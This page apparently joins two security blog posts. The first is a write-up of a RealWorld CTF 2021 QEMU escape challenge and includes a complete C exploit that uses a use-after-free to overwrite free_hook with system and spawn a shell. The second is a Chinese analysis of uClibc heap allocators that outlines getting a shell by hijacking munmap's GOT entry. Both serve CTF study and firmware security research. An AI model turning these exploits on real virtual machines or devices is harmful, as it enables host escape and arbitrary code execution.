2021年4月

一个QEMU逃逸题,虽然漏洞的逻辑也不复杂,但是此类UAF利用思路可以借鉴一下,还是很有价值的。

转自:http://pzhxbz.cn/?p=166

Easy_Escape is a qemu escape challenge in RealWorld CTF 2021,It implement a deivce named fun and has two operations: fun_mmio_write and fun_mmio_read.The code is simple:

void fun_write(struct FunState *fun,int addr,int val) {
    switch (addr) {
    case 0x0:
        fun->req_total_size = val;
        break;
    case 0x4:
        fun->addr = val;
        break;
    case 0x8:
        fun->result_addr = val;
        break;
    case 0xc:
        fun->FunReq_list_idx = val;
        break;
    case 0x10:
        if (fun->req) {
            handle_data_read(fun, fun->req,fun->FunReq_list_idx);
            break;
        }
        else{
            break;
        }
    case 0x14:
        if (fun->req) {
            break;
        }
        else {
            fun->req = create_req(fun->req_total_size);
            break;  
        }
    case 0x18:
        if (fun->req) {
            delete_req(fun->req);
            fun->req = 0;
            fun->req_total_size = 0;
            break;
        }
        else{
            fun->req = 0;
            fun->req_total_size = 0;
            break;
        }
    }
    return 0;
}
int fun_read(struct FunState *fun, int addr) {
    int ret_data = -1;
    switch (addr) {
    case 0x0:
        ret_data = fun->req_total_size;
        break;
    case 0x4:
        ret_data = fun->addr;
        break;
    case 0x8:
        ret_data = fun->result_addr;
        break;
    case 0xc:
        ret_data = fun->FunReq_list_idx;
        break;
    case 0x10:
        if (fun->req) {
            handle_data_write(fun, fun->req,fun->FunReq_list_idx);
            break;
        }
        else {
            break;
        }
    }
    return ret_data;
}

In fun_mmio_write , we can malloc and free req’s buffer,and write data into it. In fun_read, we can read data from req. In handle_data_read, there is something strange:

void __cdecl put_result(FunState *fun, uint32_t_0 val)
{
  uint32_t_0 result; // [rsp+14h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
  result = val;
  dma_memory_write_9(fun->as, fun->result_addr, &result, 4uLL);
}
void __cdecl handle_data_read(FunState *fun, FunReq *req, uint32_t_0 val)
{
  if ( req->total_size && val <= 126 && val < (req->total_size >> 10) + 1 )
  {
    put_result(fun, 1u);
    dma_memory_read_9(fun->as, (val << 10) + fun->addr, req->list[val], 0x400uLL);
    put_result(fun, 2u);
  }

put_result can write a data to somewhere, it seems useless. But if put_result write the device’s address + 0x18, it free req before we write, so it can cause a uaf.

After that , it was easy to solve. In my exploit, I leak thread arena and req’s address firstly. But I think my ways to leak req’s address may be unstable.I leaked tcache list first, next I use absolute offset calculate the the fd address to locate the req’s address. If there be more malloc or free operation, my way will get wrong address.

After leak req’s address, we can use uaf to overwrite tcache’s list point to the address which req will be, like this:

then modify the pointer in req can get anywhere write and anywhere read. I leaked the thread anera’s next and get main arena’s address, finally write free_hook to system to get the shell. Here’s the finally exp:

#include <unistd.h>
#include <sys/io.h>
#include <memory.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>


#define DEVICE_PATH "/sys/devices/pci0000:00/0000:00:04.0/resource0"
#define DEVICE_ADDR 0x00000000febf1000
#define    page_map_file     "/proc/self/pagemap"
#define    PFN_MASK          ((((uint64_t)1)<<55)-1)
#define    PFN_PRESENT_FLAG  (((uint64_t)1)<<63)


#define u64 unsigned long long
#define u32 unsigned int
#define u8 unsigned char

unsigned char* mmio_mem;
size_t pmio_base=0xc050;

void die(char*s)
{
  puts(s);
  exit(-1);
}

size_t mem_addr_vir2phy(u64 vir)
{
    int fd;
    int page_size=getpagesize();
    unsigned long vir_page_idx = vir/page_size;
    unsigned long pfn_item_offset = vir_page_idx*sizeof(uint64_t);
    uint64_t pfn_item;

    fd = open(page_map_file, O_RDONLY);
    if (fd<0)
    {
        printf("open %s failed", page_map_file);
        return -1;
    }

    if ((off_t)-1 == lseek(fd, pfn_item_offset, SEEK_SET))
    {
        printf("lseek %s failed", page_map_file);
        return -1;
    }

    if (sizeof(uint64_t) != read(fd, &pfn_item, sizeof(uint64_t)))
    {
        printf("read %s failed", page_map_file);
        return -1;
    }

    if (0==(pfn_item & PFN_PRESENT_FLAG))
    {
        printf("page is not present");
        return -1;
    }
    close(fd);
    return (pfn_item & PFN_MASK)*page_size + vir % page_size;
}

#include <stdint.h>
void mmio_write(size_t addr, size_t value)
{
  *((uint32_t *)(mmio_mem + addr)) = value;
}
size_t mmio_read(size_t addr)
{
    return *((uint32_t *)(mmio_mem + addr));
}
size_t pmio_write(size_t addr, size_t value)
{
    outl(value,addr);
}
size_t pmio_read(size_t addr)
{
    return (size_t)inl(addr);
}
void open_pmio()
{
    // Open and map I/O memory for the device
    if (iopl(3) !=0 )
        die("I/O permission is not enough");
}
void open_mmio()
{
    // Open and map I/O memory for the device
    int mmio_fd = open(DEVICE_PATH, O_RDWR | O_SYNC);
    if (mmio_fd == -1)
        die("mmio_fd open failed");
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED)
        die("mmap mmio_mem failed");
    printf("open mmio at %p\n",mmio_mem);
}

void* mmap_new()
{
    return mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
}

unsigned char shellcode[] = {0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x2e,0x63,0x68,0x6f,0x2e,0x72,0x69,0x1,0x48,0x31,0x4,0x24,0x48,0x89,0xe7,0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x68,0x6f,0x2e,0x63,0x60,0x72,0x69,0x1,0x48,0x31,0x4,0x24,0x48,0xb8,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x50,0x48,0xb8,0x72,0x69,0x1,0x2c,0x62,0x1,0x2e,0x63,0x48,0x31,0x4,0x24,0x31,0xf6,0x56,0x6a,0xe,0x5e,0x48,0x1,0xe6,0x56,0x6a,0x13,0x5e,0x48,0x1,0xe6,0x56,0x6a,0x18,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5};
//{0x6a,0x68,0x48,0xb8,0x2f,0x62,0x69,0x6e,0x2f,0x2f,0x2f,0x73,0x50,0x48,0x89,0xe7,0x68,0x72,0x69,0x1,0x1,0x81,0x34,0x24,0x1,0x1,0x1,0x1,0x31,0xf6,0x56,0x6a,0x8,0x5e,0x48,0x1,0xe6,0x56,0x48,0x89,0xe6,0x31,0xd2,0x6a,0x3b,0x58,0xf,0x5};

void* maps[100] = {0};

void alloc_req(u64 num)
{
  mmio_write(0,(num-1) << 10);
  mmio_write(0x14,123);
}
void dele_req()
{
  mmio_write(0x18,233);
}
void read_device(u64 index,u64 des_addr,u64 res_addr)
{
  u64 real_addr = des_addr - (index << 10);
  mmio_write(0xc,index);
  mmio_write(0x4,real_addr);
  mmio_write(8,res_addr);
  mmio_read(0x10);
}
void write_device(u64 index,u64 src_addr,u64 res_addr)
{
    u64 real_addr = src_addr - (index << 10);
    mmio_write(0xc,index);
    mmio_write(0x4,real_addr);
    mmio_write(8,res_addr);
    mmio_write(0x10,233);
}
u8 test_buf[0x10000];
u64 write_bufs[0x100];

void print_hex(u64 *a,size_t len)
{
  for(int i=0;i<len;i++)
  {
    printf("%p ",a[i]);
    if(i%4 ==0)
    {
      puts("");
    }
  }
  puts("");
}
void read_anywhere(u64 addr,u64 req_addr)
{
  void* test = &test_buf;
  u64* test_ptr = test_buf;
  test_ptr[0] = 0x0000000000000400;
  test_ptr[1] = addr;
  test_ptr[2] = req_addr;
  write_device(1,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  read_device(0,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  return;
}
void write_anywhere(u64 addr,u64 req_addr)
{
  void* test = &test_buf;
  u64* test_ptr = test_buf;
  test_ptr[0] = 0x0000000000000400;
  test_ptr[1] = addr;
  test_ptr[2] = req_addr;
  write_device(1,mem_addr_vir2phy(test),mem_addr_vir2phy(test+0x100));
  write_device(0,mem_addr_vir2phy((void*)&write_bufs),mem_addr_vir2phy(test+0x100));
  return;
}

char cmd[] = "/bin/bash -c '/bin/bash'";

int main(int argc, char *argv[])
{
  setbuf(stdin,0);
  setbuf(stdout,0);
  setbuf(stderr,0);
  void* test = &test_buf;//mmap_new();
  printf("%p\n",test);
  //memset(test,0x90,0x1000);
  printf("%p\n",mem_addr_vir2phy(test));
  //scanf("%s",test);
  open_mmio();
  int a;
  u64* test_ptr = test_buf;
  alloc_req(5);
  dele_req(5);
  alloc_req(5);
  u64 leak_thread_arena = 0;
  u64 tcache_addr[10] = {0};
  for(int i=0;i<5;i++)
  {
    read_device(i,mem_addr_vir2phy(test),mem_addr_vir2phy(test + 0x100));
    u64* t = test;
    u64 res = *t;
    printf("%d:%p\n",i,res);
    if(!res)
    {
      continue;
    }
    if(res != 0)
    {
      leak_thread_arena = (res>>24) << 24;
    }
    tcache_addr[i] = res;
  }
  printf("leak arena %p\n",leak_thread_arena);
  printf("leak tcache:");
  for(int i=0;i<10;i++)
  {
    printf("%p ",tcache_addr[i]);
  }
  puts("");
  //scanf("%d",&a);
  //printf("finish");
  // start tigger uaf
  dele_req();
  for(int i=0;i<2;i++)
  {
    alloc_req(2);
    dele_req();
  }
  alloc_req(3);
  u64 req_addr = tcache_addr[3] - 0x410;
  printf("guess req addr %p\n",req_addr);
  test_ptr[0] = req_addr;
  test_ptr[1] = 0;
  write_device(2,mem_addr_vir2phy(test),DEVICE_ADDR + 0x18);
  scanf("%d",&a);
  alloc_req(2);
  read_anywhere(leak_thread_arena+0x20 + 0x870,req_addr);
  //print_hex(test_ptr,30);
  u64 leak_next_arena = test_ptr[0];
  printf("leak next %p",leak_next_arena);
  read_anywhere(leak_next_arena + 0x870,req_addr);
  u64 leak_libc = test_ptr[0];
  u64 libc_base = leak_libc - 2014080;
  printf("leak libc base %p",libc_base);
  u64 system_addr = libc_base + 349200;
  u64 free_hook = libc_base + 2026280-0x200;
  memset(write_bufs,0,sizeof(write_bufs));
  write_bufs[64] = system_addr;
  memcpy(&write_bufs,cmd,sizeof(cmd));
  write_anywhere(free_hook,req_addr);
  dele_req();
  return 0;
}

0x00 Before

审计固件的时候碰到了一个mips64下uClibc堆管理利用的问题,恰巧网络上关于这个的分析不是很多,于是研究了一下。并不是很全面,做个索引,若有进一步了解时继续补全。

0x01 何为uClibc?

面向百度百科的废话

uClibc 是一个面向嵌入式Linux系统的小型的C标准库。最初uClibc是为了支持uClinux而开发,这是一个不需要内存管理单元的Linux版本,因此适合于微控制器系统。

uClibc比一般用于Linux发行版的C库GNU C Library (glibc)要小得多,glibc目标是要支持最大范围的硬件和内核平台的所有C标准,而uClibc专注于嵌入式Linux.很多功能可以根据空间需求进行取舍。

uClibc运行于标准的以及无MMU的Linux系统上,支持i386,x86 64,ARM (big/little endian), AVR32,Blackfin,h8300,m68k,MIPS (big/little endian), PowerPC,SuperH (big/little endian), SPARC,和v850等处理器。

人话

对于某些架构的嵌入式硬件,需要一个低开销的C标准库实现,于是uClibc就出现了。但是由于其实现方式与glibc差别较大,所以利用思路上需要一些转变。好在uClibc没有傻大笨glibc的各种检查,利用思路较为简单明确。

0x02 内存管理器

关于uClibc利用分析首当其冲的就是mallocfree等内存管理函数的实现。事实上通过观察其源码可以发现,uClibc中malloc有三种实现,包括malloc, malloc-simplemalloc-standard。其中 malloc-standard 是最近更新的。它就是把早期 glibcdlmalloc 移植到了 uClibc中。本文关于利用的分析重点在malloc

malloc-simple

在这个版本的内存管理逻辑中,内存的分配和释放几乎就一一对应了mmapmunmap...

malloc()

[libc/stdlib/malloc-simple/alloc.c]

#ifdef L_malloc
void *malloc(size_t size)
{
    void *result;

    if (unlikely(size == 0)) {
#if defined(__MALLOC_GLIBC_COMPAT__)
        size++;
#else
        /* Some programs will call malloc (0).  Lets be strict and return NULL */
        __set_errno(ENOMEM);
        return NULL;
#endif
    }

#ifdef __ARCH_USE_MMU__
# define MMAP_FLAGS MAP_PRIVATE | MAP_ANONYMOUS
#else
# define MMAP_FLAGS MAP_SHARED | MAP_ANONYMOUS | MAP_UNINITIALIZED
#endif

    result = mmap((void *) 0, size + sizeof(size_t), PROT_READ | PROT_WRITE,
                  MMAP_FLAGS, 0, 0);
    if (result == MAP_FAILED) {
        __set_errno(ENOMEM);
        return 0;
    }
    * (size_t *) result = size;
    return(result + sizeof(size_t));
}
#endif

可以发现size没有做过多检查和处理就进了mmap的参数,而返回的地址则由mmap决定,并不存在一个特定的heap

free()

[libc/stdlib/malloc-simple/alloc.c]

#ifdef L_free
void free(void *ptr)
{
    if (unlikely(ptr == NULL))
        return;
    if (unlikely(__libc_free_aligned != NULL)) {
        if (__libc_free_aligned(ptr))
            return;
    }
    ptr -= sizeof(size_t);
    munmap(ptr, * (size_t *) ptr + sizeof(size_t));
}
#endif

直接调用了munmap

malloc-standard

我分析的固件使用的是这个机制

location: libc/stdlib/malloc-standard/*

相对而言malloc-standard较为复杂,具体逻辑可以直接参考dlmalloc

malloc

这个版本我愿称之为“无敌大套娃”

malloc()

使用malloc函数时发生了如下调用链

void *malloc (size_t size) [libc/stdlib/malloc/malloc.c]

mem = malloc_from_heap (size, &__malloc_heap, &__malloc_heap_lock);

__malloc_from_heap (size_t size, struct heap_free_area **heap) [libc/stdlib/malloc/malloc.c]

尝试使用__heap_alloc获取堆区中管理的已释放的内存:

 /* First try to get memory that's already in our heap.  */
  mem = __heap_alloc (heap, &size);

__heap_alloc (struct heap_free_area **heap, size_t *size) [libc/stdlib/malloc/heap_alloc.c]

/* Allocate and return a block at least *SIZE bytes long from HEAP.
   *SIZE is adjusted to reflect the actual amount allocated (which may be
   greater than requested).  */
void *
__heap_alloc (struct heap_free_area **heap, size_t *size)
{
  struct heap_free_area *fa;
  size_t _size = *size;
  void *mem = 0;

  _size = HEAP_ADJUST_SIZE (_size);

  if (_size < sizeof (struct heap_free_area))
    /* Because we sometimes must use a freed block to hold a free-area node,
       we must make sure that every allocated block can hold one.  */
    _size = HEAP_ADJUST_SIZE (sizeof (struct heap_free_area));

  HEAP_DEBUG (*heap, "before __heap_alloc");

  /* Look for a free area that can contain _SIZE bytes.  */
  for (fa = *heap; fa; fa = fa->next)
    if (fa->size >= _size)
      {
    /* Found one!  */
    mem = HEAP_FREE_AREA_START (fa);
    *size = __heap_free_area_alloc (heap, fa, _size);
    break;
      }

  HEAP_DEBUG (*heap, "after __heap_alloc");

  return mem;
}

如果请求的size小于下面结构体的大小会被自动扩大(原因见注释):

/* A free-list area `header'.  These are actually stored at the _ends_ of
   free areas (to make allocating from the beginning of the area simpler),
   so one might call it a `footer'.  */
struct heap_free_area
{
    size_t size;
    struct heap_free_area *next, *prev;
};
注意这个结构体在被free的块的底部,这很重要

然后就是在一条链表(就是一开始传入的&__malloc_heap)上遍历查找第一个size大于等于请求size的节点进入一个内联函数__heap_free_area_alloc [libc/stdlib/malloc/heap.h]:

static __inline__ size_t
__heap_free_area_alloc (struct heap_free_area **heap,
            struct heap_free_area *fa, size_t size)
{
  size_t fa_size = fa->size;

  if (fa_size < size + HEAP_MIN_FREE_AREA_SIZE)
    /* There's not enough room left over in FA after allocating the block, so
       just use the whole thing, removing it from the list of free areas.  */
    {
      __heap_delete (heap, fa);
      /* Remember that we've alloced the whole area.  */
      size = fa_size;
    }
  else
    /* Reduce size of FA to account for this allocation.  */
    fa->size = fa_size - size;

  return size;
}

该函数判断分配掉目标大小的size之后,剩余体积是否足够HEAP_MIN_FREE_AREA_SIZE,不够的话就整个从链表中取出(使用的双链表unlink),否则只取出对应大小的部分内存(切割)。

如果你有疑问:为啥在切割是不涉及链表操作?

那么请往上看:struct heap_free_area这个区域在freed区域的底部,只需要修改其中的size,然后把需要的mem取出,就完成了一次切割,节省了很多链表操作,提高了效率。

...

回到__malloc_from_heap,假如没有足够大小的freed区域用于取出,则会用mmap或者sbrk的方式向操作系统取得一块新的内存,具体使用mmap还是sbrk取决于编译时使用的宏:

#ifdef MALLOC_USE_SBRK
//如果用sbrk
      __malloc_lock_sbrk ();

      /* Use sbrk we can, as it's faster than mmap, and guarantees
     contiguous allocation.  */
      block = sbrk (block_size);
      if (likely (block != (void *)-1))
    {
      /* Because sbrk can return results of arbitrary
         alignment, align the result to a MALLOC_ALIGNMENT boundary.  */
      long aligned_block = MALLOC_ROUND_UP ((long)block, MALLOC_ALIGNMENT);
      if (block != (void *)aligned_block)
        /* Have to adjust.  We should only have to actually do this
           the first time (after which we will have aligned the brk
           correctly).  */
        {
          /* Move the brk to reflect the alignment; our next allocation
         should start on exactly the right alignment.  */
          sbrk (aligned_block - (long)block);
          block = (void *)aligned_block;
        }
    }

      __malloc_unlock_sbrk ();

#else /* !MALLOC_USE_SBRK */

      /* Otherwise, use mmap.  */
#ifdef __ARCH_USE_MMU__
      block = mmap ((void *)0, block_size, PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
#else
      block = mmap ((void *)0, block_size, PROT_READ | PROT_WRITE,
            MAP_SHARED | MAP_ANONYMOUS | MAP_UNINITIALIZED, 0, 0);
#endif

注意mem在返回到用户前会经过下列宏处理,以设置malloc_header,并让mem指向用户区域:

/* Set up the malloc header, and return the user address of a malloc block. */
#define MALLOC_SETUP(base, size)  \
  (MALLOC_SET_SIZE (base, size), (void *)((char *)base + MALLOC_HEADER_SIZE))

free

有了malloc的逻辑,free的逻辑也差不多明晰了

void free (void *mem) [libc/stdlib/malloc/free.c]

static void __free_to_heap (void *mem, struct heap_free_area **heap) [libc/stdlib/malloc/free.c]

首先调用__heap_free把被free的内存放入链中:

  /* Put MEM back in the heap, and get the free-area it was placed in.  */
  fa = __heap_free (heap, mem, size);

struct heap_free_area *__heap_free (struct heap_free_area **heap, void *mem, size_t size) [libc/stdlib/malloc/hewp_free.c]

/* Return the block of memory at MEM, of size SIZE, to HEAP.  */
struct heap_free_area *
__heap_free (struct heap_free_area **heap, void *mem, size_t size)
{
  struct heap_free_area *fa, *prev_fa;
    /* 此时的mem经过MALLOC_BASE宏处理,指向MALLOC_HADER */
  void *end = (char *)mem + size;

  HEAP_DEBUG (*heap, "before __heap_free");

  /* Find the right position in the free-list entry to place the new block.
     This is the most speed critical loop in this malloc implementation:
     since we use a simple linked-list for the free-list, and we keep it in
     address-sorted order, it can become very expensive to insert something
     in the free-list when it becomes fragmented and long.  [A better
     implemention would use a balanced tree or something for the free-list,
     though that bloats the code-size and complexity quite a bit.]  */

  /* 空闲区域链表是按照地址从小到大排列的,这个循环是为了找到 mem 应该插入的位置 */
  for (prev_fa = 0, fa = *heap; fa; prev_fa = fa, fa = fa->next)
      /* 遍历判断fa的尾部是否大于被free的内存的头部 */
    if (unlikely (HEAP_FREE_AREA_END (fa) >= mem))
      break;

    /* 判断fa的头部是否小于等于被free内存的尾部(这里包含了部分overlap的情况?) */
  if (fa && HEAP_FREE_AREA_START (fa) <= end)
    /* The free-area FA is adjacent to the new block, merge them.  */
    {
      size_t fa_size = fa->size + size;
    /* 出现首尾相接 */
      if (HEAP_FREE_AREA_START (fa) == end)
    /* FA is just after the new block, grow down to encompass it. */
    {
      /* See if FA can now be merged with its predecessor. */
      /* 判断free的内存是否刚好卡在prev_fa和fa之间,是则将三个块合并,作为一个新节点 */
      if (prev_fa && mem == HEAP_FREE_AREA_END (prev_fa))
        /* Yup; merge PREV_FA's info into FA.  */
        {
          fa_size += prev_fa->size;
          __heap_link_free_area_after (heap, fa, prev_fa->prev);
        }
    }
      else
          /* 个人感觉这部分实现有些逻辑错误,正在招专业人员求证,有结果了细化一下 */
    /* FA is just before the new block, expand to encompass it. */
    {
      struct heap_free_area *next_fa = fa->next;

      /* See if FA can now be merged with its successor. */

      if (next_fa && end == HEAP_FREE_AREA_START (next_fa))
        /* Yup; merge FA's info into NEXT_FA.  */
        {
          fa_size += next_fa->size;
          __heap_link_free_area_after (heap, next_fa, prev_fa);
          fa = next_fa;
        }
      else
        /* FA can't be merged; move the descriptor for it to the tail-end
           of the memory block.  */
        {
          /* The new descriptor is at the end of the extended block,
         SIZE bytes later than the old descriptor.  */
          fa = (struct heap_free_area *)((char *)fa + size);
          /* Update links with the neighbors in the list.  */
          __heap_link_free_area (heap, fa, prev_fa, next_fa);
        }
    }
        /* 设置新节点的size */
      fa->size = fa_size;
    }
  else
    /* Make the new block into a separate free-list entry.  */
    /* 如果fa和 mem之间有空隙或者 mem> HEAP_FREE_AREA_END (fa),那么可以简单地把 mem 插入 prev_fa 和 fa之间 */
    fa = __heap_add_free_area (heap, mem, size, prev_fa, fa);

  HEAP_DEBUG (*heap, "after __heap_free");

  return fa;
}
看注释

这段代码主要处理被释放内存在入链时的合并和插入

0x03 利用思路

前置知识

uClibc中没有类似Glibc那样的__free_hook__malloc_hook的机制,但是部分函数间调用使用了类似got表的机制,这里可以看反汇编后的结果:

关于这块这么设计的原因我不太清楚...

既然如此,那么如果能通过任意地址写改libuClibc.so中某些函数的got的地址也许就可以借助system("/bin/sh\x00")来getshell。

不过要与程序本身的got表区分,如果程序已经导入了某些函数符号,直接修改掉so中这些函数符号的got是不能影响程序本身调用的目标的。(重要)

.got:00000000000A8510  # Segment type: Pure data
.got:00000000000A8510                 .data # .got
.got:00000000000A8510 off_A8510:      .dword ___libc_stack_end
.got:00000000000A8510                                          # DATA XREF: _setjmp+4↑o
.got:00000000000A8510                                          # setjmp+4↑o ...
.got:00000000000A8518                 .dword 0x8000000000000000
.got:00000000000A8520 off_A8520:      .dword qword_AA1B0       # DATA XREF: brk+24↑r
.got:00000000000A8528 off_A8528:      .dword sub_5C5C0         # DATA XREF: __sigsetjmp_aux+3C↑r
.got:00000000000A8530                 .dword sub_64730
.got:00000000000A8538                 .dword sub_647F8
.got:00000000000A8540 memcpy_ptr:     .dword memcpy
.got:00000000000A8548 off_A8548:      .dword loc_20000         # DATA XREF: vwarn+C↑r
.got:00000000000A8548                                          # vwarnx+C↑r
.got:00000000000A8550 exit_ptr:       .dword exit
.got:00000000000A8558 open_ptr:       .dword open              # DATA XREF: creat+C↑r
...

malloc-simple

很明显,释放内存的munmap是一个很好的攻击目标,它的第一个参数正好是一个字符串指针,并且可控程度很高,如果能劫持其got表就可以爽歪歪了。

malloc

大部分操作都是一个基本没啥保护的双链表的操作,而且负责管理链表的heap_free_area在每个内存块的末尾。意味着如果有UAF的和堆溢出情况下可以修改free_size,然后取出被修改的节点造成向低地址的overlap。

在取出内存的过程中存在分割操作,如果可以找到目标区域附近某些值作为free_size(最好特别大),然后修改链表的某个next指针到这。当申请内存合适的时候可以拿到目标区域的内存。注意这种利用方式不能触发__heap_delete,否则容易出错。

malloc-standard

由于这种分配器只有fastbinunsortedbin两种结构,并且检查很稀松,所以大部分ptmalloc的知识可以迁移过来。并且伪造fastbin并取出时不检查目标区域的size...这简直给了和tcache一样的大方便。

刨除这部分,重点讲下怎么getshell(因为没有各种hook)...

源码宏太多,这里直接看反编译:

void free(void *__ptr)

{
  longlong *plVar1;
  uint uVar2;
  ulonglong uVar3;
  ulonglong uVar4;
  longlong lVar5;
  ulonglong chunk_true_size;
  longlong total_size;
  longlong chunk_header_ptr;
  ulonglong chunk_size;
  longlong lVar6;
  undefined auStack64 [32];
  undefined1 *local_10;

  if (__ptr == (void *)0x0) {
    return;
  }
  local_10 = &_gp_1;
  _pthread_cleanup_push_defer(auStack64,pthread_mutex_unlock,&DAT_001a82e0);
  pthread_mutex_lock((pthread_mutex_t *)&DAT_001a82e0);
  chunk_size = *(ulonglong *)((longlong)__ptr + -8);
  chunk_true_size = chunk_size & 0xfffffffffffffffc;
  chunk_header_ptr = (longlong)__ptr + -0x10;
  if (DAT_001c2cd8 < chunk_true_size) {
    uVar4 = DAT_001c2cd8 | 1;
    if ((chunk_size & 2) != 0) {
      DAT_001c3370 = DAT_001c3370 + -1;
      total_size = chunk_true_size + *(longlong *)((longlong)__ptr + -0x10);
      _DAT_001c3388 = _DAT_001c3388 - total_size;
      /* 注意这里 */
      munmap((void *)(chunk_header_ptr - *(longlong *)((longlong)__ptr + -0x10)),(size_t)total_size)
      ;
      goto LAB_0015d85c;
......

当chunk-sized大于一个阈值(不同版本可能不同,我这里是0x50)并且is_mmap标志位为1时,会把chunk_header_ptr-prev_size的地址送入munmap中。

假设我们有办法覆盖munmap的got表为system,那么如果控制参数为"/bin/sh\x00"?

这是我的一种思路:

  1. 控制prev_size0xfffffffffffffff0 (-10)
  2. 控制size为0x63(大于阈值且is_mmap位和inuse位为1)
  3. 在用户区域开头写入"/bin/sh\x00"

这样当进入munmap时就相当于执行了system("/bin/sh\x00")

参考链接:

https://blog.csdn.net/heliangbin87/article/details/78962425

https://blog.csdn.net/weixin_30596165/article/details/96114098